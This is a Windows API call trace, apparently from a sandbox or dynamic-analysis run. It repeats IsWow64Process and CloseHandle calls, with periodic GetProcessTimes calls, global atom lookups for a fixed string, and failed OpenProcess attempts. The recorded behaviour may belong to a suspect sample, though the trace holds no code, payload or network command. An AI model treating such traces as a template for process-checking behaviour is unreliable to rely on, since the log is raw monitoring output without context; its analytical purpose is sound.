	[0129.151] CloseHandle (hObject=0x2dc) returned 1
	[0129.151] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.152] CloseHandle (hObject=0x2dc) returned 1
	[0129.152] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.152] CloseHandle (hObject=0x2dc) returned 1
	[0129.152] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.152] CloseHandle (hObject=0x2dc) returned 1
	[0129.152] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.152] CloseHandle (hObject=0x2dc) returned 1
	[0129.152] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.152] CloseHandle (hObject=0x2dc) returned 1
	[0129.153] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.153] CloseHandle (hObject=0x2dc) returned 1
	[0129.153] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.153] CloseHandle (hObject=0x2dc) returned 1
	[0129.153] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.153] CloseHandle (hObject=0x2dc) returned 1
	[0129.153] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.153] CloseHandle (hObject=0x2dc) returned 1
	[0129.154] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.154] CloseHandle (hObject=0x2dc) returned 1
	[0129.154] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.154] CloseHandle (hObject=0x2dc) returned 1
	[0129.154] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.154] CloseHandle (hObject=0x2dc) returned 1
	[0129.154] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.154] CloseHandle (hObject=0x2dc) returned 1
	[0129.155] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.155] CloseHandle (hObject=0x2dc) returned 1
	[0129.155] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.155] CloseHandle (hObject=0x2dc) returned 1
	[0129.155] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.155] CloseHandle (hObject=0x2dc) returned 1
	[0129.155] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.155] CloseHandle (hObject=0x2dc) returned 1
	[0129.155] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.155] CloseHandle (hObject=0x2dc) returned 1
	[0129.156] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.156] CloseHandle (hObject=0x2dc) returned 1
	[0129.156] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.156] CloseHandle (hObject=0x2dc) returned 1
	[0129.156] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.156] CloseHandle (hObject=0x2dc) returned 1
	[0129.156] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.156] CloseHandle (hObject=0x2dc) returned 1
	[0129.157] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.157] CloseHandle (hObject=0x2dc) returned 1
	[0129.157] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.157] CloseHandle (hObject=0x2dc) returned 1
	[0129.157] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.157] CloseHandle (hObject=0x2dc) returned 1
	[0129.158] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.158] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0129.158] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0129.158] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.158] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0129.159] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.159] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0129.159] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0129.159] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0129.159] CloseHandle (hObject=0x2dc) returned 1
	[0129.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0129.159] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.160] CloseHandle (hObject=0x2dc) returned 1
	[0129.160] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.160] CloseHandle (hObject=0x2dc) returned 1
	[0129.160] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.160] CloseHandle (hObject=0x2dc) returned 1
	[0129.160] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.160] CloseHandle (hObject=0x2dc) returned 1
	[0129.160] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.160] CloseHandle (hObject=0x2dc) returned 1
	[0129.193] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.194] CloseHandle (hObject=0x2dc) returned 1
	[0129.194] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.194] CloseHandle (hObject=0x2dc) returned 1
	[0129.194] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.194] CloseHandle (hObject=0x2dc) returned 1
	[0129.194] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.194] CloseHandle (hObject=0x2dc) returned 1
	[0129.194] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.194] CloseHandle (hObject=0x2dc) returned 1
	[0129.195] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.195] CloseHandle (hObject=0x2dc) returned 1
	[0129.195] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.195] CloseHandle (hObject=0x2dc) returned 1
	[0129.195] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.195] CloseHandle (hObject=0x2dc) returned 1
	[0129.195] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.195] CloseHandle (hObject=0x2dc) returned 1
	[0129.196] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.196] CloseHandle (hObject=0x2dc) returned 1
	[0129.196] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.196] CloseHandle (hObject=0x2dc) returned 1
	[0129.196] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.196] CloseHandle (hObject=0x2dc) returned 1
	[0129.196] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.196] CloseHandle (hObject=0x2dc) returned 1
	[0129.196] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.197] CloseHandle (hObject=0x2dc) returned 1
	[0129.197] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.197] CloseHandle (hObject=0x2dc) returned 1
	[0129.197] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.197] CloseHandle (hObject=0x2dc) returned 1
	[0129.197] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.197] CloseHandle (hObject=0x2dc) returned 1
	[0129.197] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.197] CloseHandle (hObject=0x2dc) returned 1
	[0129.198] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.198] CloseHandle (hObject=0x2dc) returned 1
	[0129.198] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.198] CloseHandle (hObject=0x2dc) returned 1
	[0129.198] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.198] CloseHandle (hObject=0x2dc) returned 1
	[0129.198] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.198] CloseHandle (hObject=0x2dc) returned 1
	[0129.199] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.199] CloseHandle (hObject=0x2dc) returned 1
	[0129.199] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.199] CloseHandle (hObject=0x2dc) returned 1
	[0129.199] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.199] CloseHandle (hObject=0x2dc) returned 1
	[0129.199] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.199] CloseHandle (hObject=0x2dc) returned 1
	[0129.200] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.200] CloseHandle (hObject=0x2dc) returned 1
	[0129.200] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.200] CloseHandle (hObject=0x2dc) returned 1
	[0129.200] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.200] CloseHandle (hObject=0x2dc) returned 1
	[0129.200] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.200] CloseHandle (hObject=0x2dc) returned 1
	[0129.201] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.201] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0129.201] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0129.201] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.202] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0129.202] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.202] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0129.202] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0129.202] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0129.202] CloseHandle (hObject=0x2dc) returned 1
	[0129.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0129.202] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.202] CloseHandle (hObject=0x2dc) returned 1
	[0129.203] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.203] CloseHandle (hObject=0x2dc) returned 1
	[0129.203] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.203] CloseHandle (hObject=0x2dc) returned 1
	[0129.203] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.203] CloseHandle (hObject=0x2dc) returned 1
	[0129.203] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.203] CloseHandle (hObject=0x2dc) returned 1
	[0129.236] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.236] CloseHandle (hObject=0x2dc) returned 1
	[0129.236] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.236] CloseHandle (hObject=0x2dc) returned 1
	[0129.236] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.236] CloseHandle (hObject=0x2dc) returned 1
	[0129.236] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.236] CloseHandle (hObject=0x2dc) returned 1
	[0129.237] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.237] CloseHandle (hObject=0x2dc) returned 1
	[0129.237] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.237] CloseHandle (hObject=0x2dc) returned 1
	[0129.237] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.237] CloseHandle (hObject=0x2dc) returned 1
	[0129.237] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.237] CloseHandle (hObject=0x2dc) returned 1
	[0129.237] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.237] CloseHandle (hObject=0x2dc) returned 1
	[0129.238] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.238] CloseHandle (hObject=0x2dc) returned 1
	[0129.238] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.238] CloseHandle (hObject=0x2dc) returned 1
	[0129.238] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.238] CloseHandle (hObject=0x2dc) returned 1
	[0129.238] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.238] CloseHandle (hObject=0x2dc) returned 1
	[0129.239] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.239] CloseHandle (hObject=0x2dc) returned 1
	[0129.239] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.239] CloseHandle (hObject=0x2dc) returned 1
	[0129.239] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.239] CloseHandle (hObject=0x2dc) returned 1
	[0129.239] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.239] CloseHandle (hObject=0x2dc) returned 1
	[0129.240] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.240] CloseHandle (hObject=0x2dc) returned 1
	[0129.240] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.240] CloseHandle (hObject=0x2dc) returned 1
	[0129.240] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.240] CloseHandle (hObject=0x2dc) returned 1
	[0129.240] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.240] CloseHandle (hObject=0x2dc) returned 1
	[0129.241] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.241] CloseHandle (hObject=0x2dc) returned 1
	[0129.241] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.241] CloseHandle (hObject=0x2dc) returned 1
	[0129.241] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.241] CloseHandle (hObject=0x2dc) returned 1
	[0129.241] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.241] CloseHandle (hObject=0x2dc) returned 1
	[0129.241] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.242] CloseHandle (hObject=0x2dc) returned 1
	[0129.242] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.242] CloseHandle (hObject=0x2dc) returned 1
	[0129.242] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.242] CloseHandle (hObject=0x2dc) returned 1
	[0129.242] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.242] CloseHandle (hObject=0x2dc) returned 1
	[0129.242] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.242] CloseHandle (hObject=0x2dc) returned 1
	[0129.243] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.243] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0129.243] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0129.244] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.244] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0129.244] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.244] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0129.244] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0129.244] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0129.244] CloseHandle (hObject=0x2dc) returned 1
	[0129.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0129.245] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.245] CloseHandle (hObject=0x2dc) returned 1
	[0129.245] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.245] CloseHandle (hObject=0x2dc) returned 1
	[0129.245] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.245] CloseHandle (hObject=0x2dc) returned 1
	[0129.245] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.245] CloseHandle (hObject=0x2dc) returned 1
	[0129.246] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.246] CloseHandle (hObject=0x2dc) returned 1
	[0129.280] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.280] CloseHandle (hObject=0x2dc) returned 1
	[0129.280] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.280] CloseHandle (hObject=0x2dc) returned 1
	[0129.280] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.280] CloseHandle (hObject=0x2dc) returned 1
	[0129.280] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.281] CloseHandle (hObject=0x2dc) returned 1
	[0129.281] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.281] CloseHandle (hObject=0x2dc) returned 1
	[0129.281] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.281] CloseHandle (hObject=0x2dc) returned 1
	[0129.281] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.281] CloseHandle (hObject=0x2dc) returned 1
	[0129.281] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.281] CloseHandle (hObject=0x2dc) returned 1
	[0129.282] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.282] CloseHandle (hObject=0x2dc) returned 1
	[0129.282] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.282] CloseHandle (hObject=0x2dc) returned 1
	[0129.282] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.282] CloseHandle (hObject=0x2dc) returned 1
	[0129.282] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.282] CloseHandle (hObject=0x2dc) returned 1
	[0129.282] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.283] CloseHandle (hObject=0x2dc) returned 1
	[0129.283] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.283] CloseHandle (hObject=0x2dc) returned 1
	[0129.283] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.283] CloseHandle (hObject=0x2dc) returned 1
	[0129.283] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.283] CloseHandle (hObject=0x2dc) returned 1
	[0129.283] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.283] CloseHandle (hObject=0x2dc) returned 1
	[0129.284] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.284] CloseHandle (hObject=0x2dc) returned 1
	[0129.284] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.284] CloseHandle (hObject=0x2dc) returned 1
	[0129.284] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.284] CloseHandle (hObject=0x2dc) returned 1
	[0129.284] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.284] CloseHandle (hObject=0x2dc) returned 1
	[0129.285] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.285] CloseHandle (hObject=0x2dc) returned 1
	[0129.285] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.285] CloseHandle (hObject=0x2dc) returned 1
	[0129.285] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.285] CloseHandle (hObject=0x2dc) returned 1
	[0129.285] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.285] CloseHandle (hObject=0x2dc) returned 1
	[0129.285] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.285] CloseHandle (hObject=0x2dc) returned 1
	[0129.286] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.286] CloseHandle (hObject=0x2dc) returned 1
	[0129.286] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.286] CloseHandle (hObject=0x2dc) returned 1
	[0129.286] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.286] CloseHandle (hObject=0x2dc) returned 1
	[0129.286] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.286] CloseHandle (hObject=0x2dc) returned 1
	[0129.287] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.287] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0129.287] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0129.287] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.288] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0129.288] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.288] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0129.288] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0129.288] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0129.288] CloseHandle (hObject=0x2dc) returned 1
	[0129.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0129.288] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.289] CloseHandle (hObject=0x2dc) returned 1
	[0129.289] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.289] CloseHandle (hObject=0x2dc) returned 1
	[0129.289] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.289] CloseHandle (hObject=0x2dc) returned 1
	[0129.289] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.289] CloseHandle (hObject=0x2dc) returned 1
	[0129.289] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
